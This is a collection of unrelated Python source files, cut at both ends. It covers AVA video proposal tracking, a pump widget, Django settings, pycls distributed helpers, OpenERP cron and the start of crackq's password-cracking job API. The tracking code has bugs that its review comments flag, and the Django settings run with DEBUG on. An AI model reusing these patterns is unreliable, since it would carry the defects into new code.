    """Propagates per-keyframe person proposals forward and backward in time
    with a single-object tracker (pysot SiamRPN-style, or OpenCV meanshift).

    Proposals are loaded from a pickle keyed by '<video_id>,<timestamp>';
    each worker process handles a shard of the keys (see
    spilit_org_proposal_dict) and dumps its results with save_result.
    """

    def __init__(self,
                 img_prefix,
                 proposal_path,
                 video_stat_file,
                 new_length=32,
                 new_step=2,
                 with_pysot=True,
                 with_shuffle=False,
                 num_gpus=1,
                 num_workers=1):
        # img_prefix: root directory of extracted raw frames, one dir per video.
        # proposal_path: pickle of {'video_id,timestamp': proposal array}.
        # video_stat_file: lines of '<video_id> <width>x<height>'.
        # new_length/new_step: temporal extent and stride of the tracked clip.
        self.img_prefix = img_prefix
        self.new_step = new_step
        self.new_length = new_length
        self.proposal_dict, self.org_proposal_dict = self.load_proposal(proposal_path)
        self.video_stats = dict([tuple(x.strip().split(' ')) for x in open(video_stat_file)])
        self.with_model = False
        self.with_pysot = with_pysot
        self.with_shuffle = with_shuffle
        self.result_dict = {}
        self.num_gpus = num_gpus
        self.num_workers = num_workers

    def load_proposal(self, path):
        """Load the proposal pickle; also build a nested {video: {frame: value}}
        view of it. Returns (nested_dict, original_flat_dict)."""
        proposal_dict = mmcv.load(path)
        convert_dict = {}
        for key, value in proposal_dict.items():
            video_id, frame = key.split(',')
            # NOTE(review): the elif branch is dead — the unconditional
            # assignment below always overwrites the entry anyway.
            if convert_dict.get(video_id,None) is None:
                convert_dict[video_id] = {}
            elif convert_dict[video_id].get(frame, None) is None:
                convert_dict[video_id][frame] = {}
            convert_dict[video_id][frame] = value
        return convert_dict, proposal_dict

    def _load_image(self, directory, image_tmpl, modality, idx):
        """Read frame idx from directory using the filename template; RGB gives
        one BGR image (mmcv default), Flow gives an [x, y] grayscale pair."""
        if modality in ['RGB', 'RGBDiff']:
            return mmcv.imread(osp.join(directory, image_tmpl.format(idx)))
        elif modality == 'Flow':
            x_imgs = mmcv.imread(
                osp.join(directory, image_tmpl.format('x', idx)),
                flag='grayscale')
            y_imgs = mmcv.imread(
                osp.join(directory, image_tmpl.format('y', idx)),
                flag='grayscale')
            return [x_imgs, y_imgs]
        else:
            raise ValueError(
                'Not implemented yet; modality should be '
                '["RGB", "RGBDiff", "Flow"]')

    def spilit_proposal_dict(self):
        """Shard the nested proposal dict across num_gpus*num_workers workers.

        NOTE(review): the tail-shard condition compares against
        self.num_gpus - 1 rather than num_gpus*num_workers - 1 (compare
        spilit_org_proposal_dict below) — confirm which is intended.
        """
        keys = list(self.proposal_dict.keys())
        if self.with_shuffle:
            random.shuffle(keys)
        shuffle_dict = [(key, self.proposal_dict[key]) for key in keys]
        video_per_gpu = int(len(shuffle_dict) // (self.num_gpus*self.num_workers))
        self.sub_shuffle_dict_list = [shuffle_dict[i * video_per_gpu:(i + 1) * video_per_gpu]
                                      if i != self.num_gpus - 1 else shuffle_dict[i * video_per_gpu:]
                                      for i in range(self.num_gpus*self.num_workers)]
        self.shuffle_dict = shuffle_dict

    def spilit_org_proposal_dict(self):
        """Shard the flat proposal dict across num_gpus*num_workers workers;
        the last shard absorbs the remainder."""
        keys = list(self.org_proposal_dict.keys())
        if self.with_shuffle:
            random.shuffle(keys)
        # NOTE(review): the 'if True or ...' filter is a debugging leftover
        # that keeps every key; the video/timestamp restriction is disabled.
        shuffle_dict = [(key, self.org_proposal_dict[key]) for key in keys if True or '-5KQ66BBWC' in key and 900<=int(key[-4:])<=950]
        video_per_gpu = int(len(shuffle_dict) // (self.num_gpus*self.num_workers))
        self.sub_shuffle_dict_list = [shuffle_dict[i * video_per_gpu:(i + 1) * video_per_gpu]
                                      if i != (self.num_gpus*self.num_workers) - 1 else shuffle_dict[i * video_per_gpu:]
                                      for i in range(self.num_gpus*self.num_workers)]
        self.shuffle_dict = shuffle_dict

    def tracking(self, index):
        """Track every proposal of shard ``index`` backward then forward in
        time, accumulating results into self.result_dict[frame_info]."""
        self.index = index
        self.spilit_org_proposal_dict()
        if self.with_pysot:
            self.init_tracker()
        len_proposal = sum([len(proposals) for frame_info,proposals in self.sub_shuffle_dict_list[index]])
        print("Process:{},proposal lenght:{}".format(self.index, len_proposal))
        cnt_time = 0
        cnt_proposal = 0
        begin = time.time()
        cnt = 0
        for id_frame, (frame_info, proposals) in enumerate(self.sub_shuffle_dict_list[index]):
            video_id, timestamp = frame_info.split(',')
            # Frame index of this keyframe within the extracted frame folder.
            indice = _FPS * (int(timestamp) - _TIMESTAMP_START) + 1
            image_tmpl = 'img_{:05}.jpg'
            self.result_dict[frame_info] = []
            for ik, proposal in enumerate(proposals):
                new_proposals = []
                # Proposal is normalized [x1, y1, x2, y2, score]; scale to pixels.
                width, height = [int(ll) for ll in self.video_stats[video_id].split('x')]
                ROI = np.array([int(x) for x in (proposal * np.array([
                    width, height, width, height, 1
                ]))[:4]])
                # (x, y, w, h) window expected by the trackers.
                track_window = tuple(np.concatenate([ROI[:2],ROI[-2:]-ROI[:2]],axis=0).tolist())
                ann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', indice)
                # Debug visualization — disabled by the trailing 'and False'.
                if False or frame_info == '-5KQ66BBWC4,0934' and False:
                    plt.imshow(ann_frame[:,:,::-1])
                    color = (random.random(), random.random(), random.random())
                    rect = plt.Rectangle((track_window[0],track_window[1]),
                                         track_window[2],
                                         track_window[3], fill=False,
                                         edgecolor=color, linewidth=5)
                    plt.gca().add_patch(rect)
                    plt.show()
                self.init_frame(ann_frame, track_window)
                # Backward ("forecasting") pass: step earlier in time, prepending
                # each tracked window so new_proposals stays chronological.
                p = indice - self.new_step
                for i, ind in enumerate(
                        range(-2, -(self.new_length+1), -self.new_step)):
                    unann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', p)
                    if self.with_pysot:
                        track_window = self.pysot_tracking_roi(track_window,
                                                               key_frame=ann_frame,
                                                               tracked_frame=unann_frame,
                                                               vis= frame_info == '-5KQ66BBWC4,0934' and False)
                    else:
                        track_window = self.cv2_tracking_roi(track_window,
                                                             org_frame=ann_frame,
                                                             tracked_frame=unann_frame)
                    new_proposals = [np.array(track_window) / np.array([width, height, width, height])] + new_proposals
                    ann_frame = unann_frame.copy()
                    p -= self.new_step
                if frame_info == '-5KQ66BBWC4,0934' and False:
                    print(self.index, np.array(ROI) / np.array([width, height, width, height]),
                          np.array(track_window) / np.array([width, height, width, height]))
                # Reset to the annotated keyframe before the forward pass.
                track_window = tuple(np.concatenate([ROI[:2], ROI[-2:] - ROI[:2]], axis=0).tolist())
                ann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', indice)
                new_proposals.append(np.array(ROI) / np.array([width, height, width, height]))
                # Forward ("backcasting") pass: step later in time, appending.
                p = indice + self.new_step
                for i, ind in enumerate(
                        range(0, self.new_length-2, self.new_step)):
                    unann_frame = self._load_image(osp.join(self.img_prefix, video_id), image_tmpl, 'RGB', p)
                    if self.with_pysot:
                        track_window = self.pysot_tracking_roi(track_window,
                                                               key_frame=ann_frame,
                                                               tracked_frame=unann_frame,
                                                               vis=frame_info == '-5KQ66BBWC4,0934' and False)
                    else:
                        track_window = self.cv2_tracking_roi(track_window,
                                                             org_frame=ann_frame,
                                                             tracked_frame=unann_frame)
                    new_proposals += [np.array(track_window) / np.array([width, height, width, height])]
                    ann_frame = unann_frame
                    p += self.new_step
                # Progress bookkeeping / ETA estimate.
                end = time.time()
                cnt_time +=(end-begin)
                cnt_proposal += 1
                avg_time = (end-begin)/cnt_proposal
                left_time = (len_proposal-cnt_proposal)*avg_time
                # Store the full normalized track plus the proposal score.
                self.result_dict[frame_info].append((new_proposals, proposal[-1]))
                if cnt_proposal % 10== 0:
                    print('Process:{}, length_process:{}/{}, video_id:{}, frame:{}, proposal_id:{}th, proposal_len:{}, per_cost_time:{} , left_time:{}'.format(self.index,
                          cnt_proposal, len_proposal, video_id, timestamp, ik, len(proposals), avg_time,
                          datetime.timedelta(seconds=int(left_time))))

    def build_model(self):
        """Build the pysot tracker: load the snapshot weights, move the model
        to this worker's GPU (workers are grouped num_workers-per-GPU)."""
        model = ModelBuilder()
        model.load_state_dict(torch.load(args.snapshot,
            map_location=lambda storage, loc: storage.cpu()))
        device = torch.device('cuda:{}'.format(int(self.index//self.num_workers)) if cfg.CUDA else 'cpu')
        print(device)
        model.eval().to(device)
        tracker = build_tracker(model)
        return tracker

    def init_tracker(self):
        # Lazily construct the tracker once per worker process.
        self.tracking_model = self.build_model()

    def init_frame(self, frame, track_window):
        # Seed the tracker with the keyframe and its (x, y, w, h) window.
        self.tracking_model.init(frame, track_window)

    def pysot_tracking_roi(self, track_window, key_frame, tracked_frame, vis=False or True):
        """Advance the pysot tracker one frame; returns [x1, y1, x2, y2].

        NOTE(review): the default 'vis=False or True' evaluates to True, but
        every caller in tracking() passes vis explicitly.
        """
        outputs = self.tracking_model.track(tracked_frame)
        if 'polygon' in outputs:
            # NOTE(review): 'polygon' is undefined in this scope — this branch
            # would raise NameError if a mask-producing tracker were used.
            cv2.polylines(tracked_frame, [polygon.reshape((-1, 1, 2))],
                          True, (0, 255, 0), 3)
            mask = ((outputs['mask'] > cfg.TRACK.MASK_THERSHOLD) * 255)
            mask = mask.astype(np.uint8)
            mask = np.stack([mask, mask * 255, mask]).transpose(1, 2, 0)
            tracked_frame = cv2.addWeighted(tracked_frame, 0.77, mask, 0.23, -1)
        else:
            bbox = list(map(int, outputs['bbox']))
            cv2.rectangle(tracked_frame, (bbox[0], bbox[1]),
                          (bbox[0] + bbox[2], bbox[1] + bbox[3]),
                          (0, 255, 0), 1)
        # Convert the tracker's (x, y, w, h) output to corner coordinates.
        bbox = list(map(int, outputs['bbox']))
        bbox = [bbox[0],bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]
        if vis:
            plt.imshow(tracked_frame[:,:,::-1])
            plt.show()
        return bbox

    def cv2_tracking_roi(self, track_window, org_frame, tracked_frame, vis=True):
        """Meanshift fallback tracker: hue-histogram back-projection of the
        previous window, then cv2.meanShift. Returns the new (x, y, w, h)."""
        x, y, w, h = track_window
        roi = org_frame[y:y+h, x:x+w]
        hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv_roi, np.array((0., 0.,0.)), np.array((180.,255.,255.)))
        roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
        cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
        # Stop after 10 iterations or when the window moves < 1 px.
        term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
        hsv = cv2.cvtColor(tracked_frame, cv2.COLOR_BGR2HSV)
        dst = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)
        # apply meanshift to get the new location
        ret, track_window = cv2.meanShift(dst, track_window, term_crit)
        if vis:
            x, y, w, h = track_window
            img2 = cv2.rectangle(tracked_frame, (x, y), (x + w, y + h), 255, 1)
            plt.imshow(img2[:,:,::-1])
            plt.show()
        return track_window

    def save_result(self, d_type):
        """Dump this worker's result_dict to ./pkl_results/, tagged with the
        split name and the worker index."""
        with open('./pkl_results/{}_results_dict_{}.pkl'.format(d_type,self.index),'wb') as f:
            pickle.dump(self.result_dict, f)


data_root = '/home/yhxu/code/mmaction/data/ava/rawframes/'
d_type='train'


def multi_track(index):
    """Worker entry point: build a Tracking_Proposal, process shard ``index``
    and persist the results (8 GPUs x 4 workers = 32 shards)."""
    tracking_inst = Tracking_Proposal(
        img_prefix=data_root,
        proposal_path='/home/yhxu/code/mmaction/data/ava/ava_dense_proposals_{}.FAIR.recall_93.9.pkl'.format(d_type),
        video_stat_file='/home/yhxu/code/mmaction/data/ava/ava_video_resolution_stats.csv',
        new_length=32,
        new_step=2,
        with_shuffle=False,
        num_gpus=8,
        num_workers=4,
    )
    tracking_inst.tracking(index)
    tracking_inst.save_result(d_type)


if __name__ == '__main__':
    # Spawn (not fork) so each worker gets a clean CUDA context.
    ctx = multiprocessing.get_context('spawn')
    workers = [ctx.Process(target=multi_track,args=(rank,)) for rank in range(32)]
    index_queue = ctx.Queue()
    result_queue = ctx.Queue()
    for w in workers:
        w.daemon = True
        w.start()
    print('end->>!!!')
    for i in range(1000):
        index_queue.put(i)
    # NOTE(review): multi_track never touches index_queue/result_queue, so
    # this get() loop blocks forever once workers finish — confirm whether
    # the queues are leftovers from an earlier producer/consumer design.
    for i in range(1000):
        idx, res = result_queue.get()
#import ipdb #ipdb.set_trace() # for # # rst = result_queue.get() # # print('saving_results')
pump_ui.py
import logging
import threading

import ipywidgets as ipw

logger = logging.getLogger(__name__)


class PumpUI(object):
    """ipywidgets control panel for a pump driven through ``proxy``.

    The proxy is only required to expose the three methods called here:
    ``pump_frequency_set``, ``pump_activate`` and ``pump_deactivate``.
    The assembled widget tree is available as ``self.widget``.
    """

    def __init__(self, proxy):
        # proxy: hardware/driver facade that the widget callbacks talk to.
        self.proxy = proxy

        def _pump_frequency(message):
            # Slider observer: forward the new frequency value to the pump.
            proxy.pump_frequency_set(message['new'])

        pump_frequency = ipw.FloatSlider(description='Frequency (Hz):',
                                         min=1, max=1e4, value=1e3)
        pump_frequency.observe(_pump_frequency, names=['value'])

        pump_duration = ipw.FloatSlider(description='Duration (s):', min=0,
                                        max=120., value=3.)

        def _pump_trigger(*args):
            # One pump run per click: activate, wait up to the selected
            # duration (or until cancelled), then deactivate.
            cancel = threading.Event()

            def _cancel_pump(*args):
                cancel.set()

            # NOTE(review): a fresh cancel handler is registered on every
            # trigger click; earlier handlers accumulate on the button
            # (harmless for cancellation, but they are never removed).
            pump_cancel.on_click(_cancel_pump)

            def _pump():
                _disable_widgets()
                proxy.pump_activate()
                try:
                    # Event.wait returns True only when cancel was set
                    # before the timeout elapsed.
                    if cancel.wait(pump_duration.value):
                        logger.warning('Pump action was cancelled.')
                    else:
                        logger.info('Pump action completed.')
                finally:
                    # Always deactivate and restore the UI, even on error.
                    proxy.pump_deactivate()
                    _enable_widgets()

            # Daemon thread: a pending pump wait must not block kernel exit.
            thread = threading.Thread(target=_pump)
            thread.daemon = True
            thread.start()

        pump_trigger = ipw.Button(description='Pump')
        pump_trigger.on_click(_pump_trigger)
        pump_cancel = ipw.Button(description='Cancel')

        widget = ipw.VBox([pump_frequency, pump_duration, pump_trigger,
                           pump_cancel])

        def _enable_widgets():
            # Re-enable every child (frequency and cancel included).
            for widget_i in widget.children:
                widget_i.disabled = False

        def _disable_widgets():
            # Lock only duration and trigger during a run: cancel must stay
            # clickable and frequency may still be adjusted live.
            for widget_i in [pump_duration, pump_trigger]:
                widget_i.disabled = True

        self.widget = widget
settings_20210906111618.py
""" Django settings for First_Wish project. Generated by 'django-admin startproject' using Django 3.2. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ from pathlib import Path import os import environ import threading import schedule import time from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails env_path = os.path.join(os.path.dirname(__file__), '../.env') environ.Env.read_env(env_path) # schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails) # ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS//////////////////// # Schedule the task at 00:01 everyday def sayHi(): print("Hi") schedule.every().day.at("11:17").do(sayHi) # schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise) def func(): while True: print("======Runnning==========") schedule.run_pending() time.sleep(5) t1 = threading.Thread(target=func) t1.start() # ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS//////////////////// # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent templates_path=os.path.join(BASE_DIR,'templates') # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! 
DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'First_Wish_Main_App', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'First_Wish.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [templates_path], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'First_Wish.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Kolkata' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # 
https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATICFILES_DIRS = [ os.path.join(BASE_DIR, "static"), ]
distributed.py
#!/usr/bin/env python3

# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

"""Distributed helpers."""

import multiprocessing
import os
import random
import signal
import threading
import traceback

import torch
from pycls.core.config import cfg


# Make work w recent PyTorch versions (https://github.com/pytorch/pytorch/issues/37377)
os.environ["MKL_THREADING_LAYER"] = "GNU"


def is_master_proc():
    """Determines if the current process is the master process.

    Master process is responsible for logging, writing and loading checkpoints. In
    the multi GPU setting, we assign the master role to the rank 0 process. When
    training using a single GPU, there is a single process which is considered master.
    """
    return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0


def init_process_group(proc_rank, world_size, port):
    """Initializes the default process group.

    proc_rank: rank of this process; also used as the CUDA device index.
    world_size: total number of participating processes.
    port: TCP port on cfg.HOST used for rendezvous.
    """
    # Set the GPU to use
    torch.cuda.set_device(proc_rank)
    # Initialize the process group
    torch.distributed.init_process_group(
        backend=cfg.DIST_BACKEND,
        init_method="tcp://{}:{}".format(cfg.HOST, port),
        world_size=world_size,
        rank=proc_rank,
    )


def destroy_process_group():
    """Destroys the default process group."""
    torch.distributed.destroy_process_group()


def scaled_all_reduce(tensors):
    """Performs the scaled all_reduce operation on the provided tensors.

    The input tensors are modified in-place. Currently supports only the sum
    reduction operator. The reduced values are scaled by the inverse size of the
    process group (equivalent to cfg.NUM_GPUS). Returns the same tensor list.
    """
    # There is no need for reduction in the single-proc case
    if cfg.NUM_GPUS == 1:
        return tensors
    # Queue the reductions asynchronously so they can overlap
    reductions = []
    for tensor in tensors:
        reduction = torch.distributed.all_reduce(tensor, async_op=True)
        reductions.append(reduction)
    # Wait for reductions to finish
    for reduction in reductions:
        reduction.wait()
    # Scale the results by 1/world-size to get the mean
    for tensor in tensors:
        tensor.mul_(1.0 / cfg.NUM_GPUS)
    return tensors


class ChildException(Exception):
    """Wraps an exception (its traceback string) from a child process."""

    def __init__(self, child_trace):
        super(ChildException, self).__init__(child_trace)


class ErrorHandler(object):
    """Multiprocessing error handler (based on fairseq's).

    Listens for errors in child processes and propagates the tracebacks to the
    parent. The flow is: child puts a traceback on the shared queue -> the
    listener thread re-queues it and raises SIGUSR1 in this process -> the
    signal handler kills the children and re-raises as ChildException.
    """

    def __init__(self, error_queue):
        # Shared error queue
        self.error_queue = error_queue
        # Children processes sharing the error queue
        self.children_pids = []
        # Start a thread listening to errors
        self.error_listener = threading.Thread(target=self.listen, daemon=True)
        self.error_listener.start()
        # Register the signal handler (SIGUSR1 is POSIX-only)
        signal.signal(signal.SIGUSR1, self.signal_handler)

    def add_child(self, pid):
        """Registers a child process."""
        self.children_pids.append(pid)

    def listen(self):
        """Listens for errors in the error queue."""
        # Wait until there is an error in the queue
        child_trace = self.error_queue.get()
        # Put the error back for the signal handler
        self.error_queue.put(child_trace)
        # Invoke the signal handler on the main thread via SIGUSR1
        os.kill(os.getpid(), signal.SIGUSR1)

    def signal_handler(self, _sig_num, _stack_frame):
        """Signal handler: tear down children and surface the child's error."""
        # Kill children processes
        for pid in self.children_pids:
            os.kill(pid, signal.SIGINT)
        # Propagate the error from the child process
        raise ChildException(self.error_queue.get())


def run(proc_rank, world_size, port, error_queue, fun, fun_args, fun_kwargs):
    """Runs a function from a child process.

    Initializes the process group first; any exception (other than the
    parent-initiated KeyboardInterrupt) is reported via error_queue.
    """
    try:
        # Initialize the process group
        init_process_group(proc_rank, world_size, port)
        # Run the function
        fun(*fun_args, **fun_kwargs)
    except KeyboardInterrupt:
        # Killed by the parent process
        pass
    except Exception:
        # Propagate exception to the parent process
        error_queue.put(traceback.format_exc())
    finally:
        # Destroy the process group
        destroy_process_group()


def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None):
    """Runs a function in a multi-proc setting (unless num_proc == 1).

    Spawns num_proc children running `fun` with ranks 0..num_proc-1 and a
    shared rendezvous port, then blocks until all of them finish.
    """
    # There is no need for multi-proc in the single-proc case
    fun_kwargs = fun_kwargs if fun_kwargs else {}
    if num_proc == 1:
        fun(*fun_args, **fun_kwargs)
        return
    # Handle errors from training subprocesses
    error_queue = multiprocessing.SimpleQueue()
    error_handler = ErrorHandler(error_queue)
    # Get a random port to use (without using global random number generator)
    port = random.Random().randint(cfg.PORT_RANGE[0], cfg.PORT_RANGE[1])
    # Run each training subprocess
    ps = []
    for i in range(num_proc):
        p_i = multiprocessing.Process(
            target=run, args=(i, num_proc, port, error_queue, fun, fun_args, fun_kwargs)
        )
        ps.append(p_i)
        p_i.start()
        error_handler.add_child(p_i.pid)
    # Wait for each subprocess to finish
    for p in ps:
        p.join()
cron.py
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-2011 OpenERP SA (<http://www.openerp.com>)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

""" Cron jobs scheduling

Cron jobs are defined in the ir_cron table/model. This module deals with all
cron jobs, for all databases of a single OpenERP server instance.

"""

import logging
import threading
import time

from datetime import datetime

import openerp

_logger = logging.getLogger(__name__)

SLEEP_INTERVAL = 60  # 1 min


def cron_runner(number):
    """Endless polling loop run by cron worker thread ``number``.

    Every SLEEP_INTERVAL (+ number, so the workers are phase-shifted and do
    not all wake at once) seconds, iterate over every ready database
    registry and keep acquiring pending ir_cron jobs until none is left.
    """
    while True:
        time.sleep(SLEEP_INTERVAL + number)  # Steve Reich timing style
        registries = openerp.modules.registry.RegistryManager.registries
        _logger.debug('cron%d polling for jobs', number)
        for db_name, registry in registries.items():
            # Drain all currently-due jobs for this database.
            while registry.ready:
                # acquired = openerp.addons.base.ir.ir_cron.ir_cron._acquire_job(db_name)
                # TODO why isnt openerp.addons.base defined ?
                import sys
                base = sys.modules['addons.base']
                acquired = base.ir.ir_cron.ir_cron._acquire_job(db_name)
                if not acquired:
                    break


def start_service():
    """ Start the above runner function in a daemon thread.

    The thread is a typical daemon thread: it will never quit and must be
    terminated when the main process exits - with no consequence (the processing
    threads it spawns are not marked daemon).

    """
    # Force call to strptime just before starting the cron thread
    # to prevent time.strptime AttributeError within the thread.
    # See: http://bugs.python.org/issue7980
    datetime.strptime('2012-01-01', '%Y-%m-%d')

    for i in range(openerp.tools.config['max_cron_threads']):
        # Pass ``i`` through ``args`` instead of closing over the loop
        # variable: a ``def target(): cron_runner(i)`` closure reads ``i``
        # only when the thread actually runs, by which time the loop may
        # already have advanced (late-binding bug) — several workers could
        # end up polling with the same number.
        t = threading.Thread(target=cron_runner, args=(i,),
                             name="openerp.service.cron.cron%d" % i)
        t.daemon = True  # setDaemon() is deprecated in favor of the attribute
        t.start()
        _logger.debug("cron%d started!" % i)


def stop_service():
    """Nothing to stop: the cron threads are daemonic and die with the process."""
    pass

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
cq_api.py
"""Main Flask code handling REST API""" import json import nltk import os import re import rq import saml2 import threading import time import uuid import crackq from crackq.db import db from crackq.logger import logger from crackq.models import User from crackq import crackqueue, hash_modes, auth from crackq.validator import FileValidation as valid from crackq.conf import hc_conf from datetime import datetime from flask import ( abort, Flask, jsonify, redirect, request, session) from flask.views import MethodView from flask_bcrypt import Bcrypt from flask_seasurf import SeaSurf from flask_login import ( LoginManager, login_required, login_user, logout_user, current_user) from functools import wraps from marshmallow import Schema, fields, validate, ValidationError from marshmallow.validate import Length, Range from operator import itemgetter from pathlib import Path from pypal import pypal from redis import Redis from rq import Queue from rq.serializers import JSONSerializer from saml2 import BINDING_HTTP_POST from saml2 import sigver from sqlalchemy.orm import exc # set perms os.umask(0o077) # Setup Flask App login_manager = LoginManager() app = Flask(__name__) csrf = SeaSurf() bcrypt = Bcrypt(app) CRACK_CONF = hc_conf() # Define HTTP messages ERR_INVAL_JID = {'msg': 'Invalid Job ID'} ERR_METH_NOT = {'msg': 'Method not supported'} ERR_BAD_CREDS = {"msg": "Bad username or password"} class StringContains(validate.Regexp): """ Custom validation class to reject any strtings matching supplied regex See validate.Regexp for args/return values """ default_message = 'Invalid input for this field.' 
def __call__(self, value): if len(self.regex.findall(value)) > 0: raise ValidationError(self._format_error(value)) return value class parse_json_schema(Schema): """ Class to create the schema for parsing received JSON arguments job_details: str string returned from rq.job.description Returns ------ deets_dict: dictionary only the specified job details are returned """ error_messages = { "name": "Invalid input characters", "username": "Invalid input characters", } job_id = fields.UUID(allow_none=False) batch_job = fields.List(fields.Dict(keys=fields.Str(), place=fields.Int(), job_id=fields.UUID())) hash_list = fields.List(fields.String(validate=StringContains( r'[^A-Za-z0-9\*\$\@\/\\\.\:\-\_\+\.]+\~')), allow_none=True, error_messages=error_messages) wordlist = fields.Str(allow_none=True, validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]) wordlist2 = fields.Str(allow_none=True, validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]) attack_mode = fields.Int(allow_none=True, validate=Range(min=0, max=9)) rules = fields.List(fields.String(validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]), allow_none=True) username = fields.Bool(allow_none=True) notify = fields.Bool(allow_none=True) increment = fields.Bool(allow_none=True) disable_brain = fields.Bool(allow_none=True) increment_min = fields.Int(allow_none=True, validate=Range(min=0, max=20)) increment_max = fields.Int(allow_none=True, validate=Range(min=0, max=20)) mask = fields.Str(allow_none=True, validate=StringContains(r'[^aldsu\?0-9a-zA-Z]')) mask_file = fields.List(fields.String(validate=[StringContains(r'[\W]\-'), Length(min=1, max=60)]), allow_none=True) name = fields.Str(allow_none=True, validate=StringContains(r'[\W]'), error_messages=error_messages) hash_mode = fields.Int(allow_none=False, validate=Range(min=0, max=65535)) restore = fields.Int(validate=Range(min=0, max=1000000000000)) user = fields.Str(allow_none=False, validate=StringContains(r'[\W]')) password = 
fields.Str(allow_none=False, validate=StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]')) confirm_password = fields.Str(allow_none=True, validate=[StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]'), Length(min=10, max=60)]) new_password = fields.Str(allow_none=True, validate=[StringContains(r'[^\w\!\@\#\$\%\^\&\*\(\)\-\+\.\,\\\/]'), Length(min=10, max=60)]) email = fields.Str(allow_none=False, validate=StringContains(r'[^\w\@\^\-\+\./]')) admin = fields.Bool(allow_none=True) benchmark_all = fields.Bool(allow_none=True) timeout = fields.Int(validate=Range(min=1, max=28800000), allow_none=True) def get_jobdetails(job_details): """ Function to help pull only required information from a specified redis job description string. job_details: str string returned from rq.job.description Returns ------ deets_dict: dictionary only the specified job details are returned """ deets_dict = {} if 'Benchmark' in job_details: deet_match_list = [ 'name', 'benchmark', 'benchmark_all' ] else: deet_match_list = [ 'hash_mode', 'attack_mode', 'mask', 'wordlist', 'wordlist2', 'rules', 'name', 'username', 'increment', 'increment_min', 'increment_max', 'disable_brain', 'brain_check', 'restore'] ###***make this less ugly ###***review stripping here for improvement logger.debug('Parsing job details:\n{}'.format(job_details)) # Process rules list separately as workaround for splitting on comma if '[' in job_details: ###***add mask_file here when updating to allow list of files rules_split = 